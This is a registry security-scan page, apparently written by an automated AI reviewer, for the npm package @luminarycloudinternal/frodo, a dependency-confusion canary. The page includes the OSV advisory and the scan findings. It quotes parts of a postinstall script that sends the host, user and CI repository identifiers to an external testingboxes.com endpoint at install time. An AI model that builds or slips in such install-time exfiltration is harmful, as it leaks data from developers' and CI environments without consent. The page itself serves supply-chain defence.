registry  /  @luminarycloudinternal/frodo  /  9999.0.2

@luminarycloudinternal/frodo@9999.0.2

Security research placeholder (Bugcrowd luminarycloud-mbb-od2, submission 10d62a7c). Benign dependency-confusion canary held by researcher account mdpsec. No functional code. Will be unpublished or transferred to Luminary Cloud on request.

AI Security Review

scanned 2h ago · by lpm-firewall-ai

Install triggers a dependency-confusion canary that fingerprints the environment and sends it to an external researcher endpoint. No persistence or credential file harvesting was found, but the network callback is automatic at install time.

Static reason
One or more suspicious static signals were detected.
Trigger
npm install runs package postinstall lifecycle
Impact
Leaks package, npm user agent, CI/repo metadata, hostname, username, and OS details to an external endpoint
Mechanism
install-time host and CI fingerprint exfiltration via HTTPS GET
Rationale
Source inspection confirms automatic install-time host/CI fingerprint exfiltration to an external endpoint for a dependency-confusion canary. Even without credential theft, persistence, or destructive actions, this is concrete unconsented install-time data exfiltration from environments resolving an internal-looking package name. Product guard normalized a non-low false-positive publish_block request to warn-only suspicious.
Evidence
package.jsonpostinstall.jsREADME.md
Network endpoints1
poc-luminary-npm-1782987043.testingboxes.com/cb/5457161feaa0f110e5790adead3a652e0a2f40773c6cfb40

OSV Corroboration

OpenSSF/OSV
Advisory
MAL-2026-6986
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in @luminarycloudinternal/frodo (npm)
Details
Package published under a scope shadowing internal Luminary Cloud packages (@luminarycloudinternal) at version 9999.0.1 — the canonical dependency-confusion shape designed to win version resolution over a private internal package of the same name. On install, postinstall.js (line 8) performs an HTTPS GET to a hardcoded external host (poc-luminary-npm-1782987043.testingboxes.com) carrying installer-owned CI and host identifiers: GITHUB_REPOSITORY, GITHUB_SHA, GITHUB_REF, GITHUB_WORKFLOW, RUNNER_NAME, os.hostname(), and npm user-agent. When a build system misresolves the internal name to the public registry, this postinstall runs automatically and discloses internal repository, workflow, commit, and runner identifiers to a third-party endpoint. The package self-identifies as a Bugcrowd research canary, but self-labeling does not change the mechanism: installer-owned metadata leaves the machine at install time to a non-first-party destination via a namespace-squat.

Decision evidence

public snapshot
AI called this Suspicious at 93.0% confidence as Malware with medium false-positive risk.
Evidence for block
  • package.json defines install-time postinstall: node postinstall.js
  • postinstall.js sends HTTPS GET to external testingboxes.com endpoint during install
  • postinstall.js collects host/user/OS plus CI repo, runner, sha, ref, workflow env identifiers
  • postinstall.js suppresses errors and never fails install
Evidence against
  • No child_process, shell execution, eval, dynamic require, or native/binary loading found
  • No file reads/writes or persistence found beyond executing postinstall.js
  • README/package comments describe it as a dependency-confusion canary
Behavioral surface
Source
EnvironmentVarsNetwork
Supply chain
HighEntropyStringsUrlStrings
ManifestNo manifest risk signals triggered.
scanned 1 file(s), 1.85 KB of source, external domains: poc-luminary-npm-1782987043.testingboxes.com

Source & flagged code

3 flagged · loading source
package.jsonView file
scripts.postinstall = node postinstall.js
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg
scripts.postinstall = node postinstall.js
Medium
Ambiguous Install Lifecycle Script

Install-time lifecycle script is not statically allowlisted and needs review.

package.jsonView on unpkg
postinstall.jsView file
8try { L9: var https = require('https'); L10: var os = require('os'); L11: var e = process.env; L12: var pkg = (e.npm[redacted] || '') + '@' + (e.npm[redacted] || ''); L13: // whoami-equivalent: os.userInfo().username reads the effective user without L14: // spawning a shell (kept benign, no child process). ... L18: try { osname = [os.type && os.type(), os.release && os.release(), os.platform && os.platform(), os.arch && os.arch()].filter(Boolean).join(' '); } catch (o) {} L19: var q = new URLSearchParams({ L20: pkg: pkg, L21: ua: e.npm[redacted] || '', L22: ci: e.CI || '',
High
Host Fingerprint Exfiltration

Source collects local host identity data and sends it to an external endpoint.

postinstall.jsView on unpkg · L8

Findings

2 High3 Medium3 Low
HighInstall Time Lifecycle Scriptspackage.json
HighHost Fingerprint Exfiltrationpostinstall.js
MediumAmbiguous Install Lifecycle Scriptpackage.json
MediumNetwork
MediumEnvironment Vars
LowScripts Present
LowHigh Entropy Strings
LowUrl Strings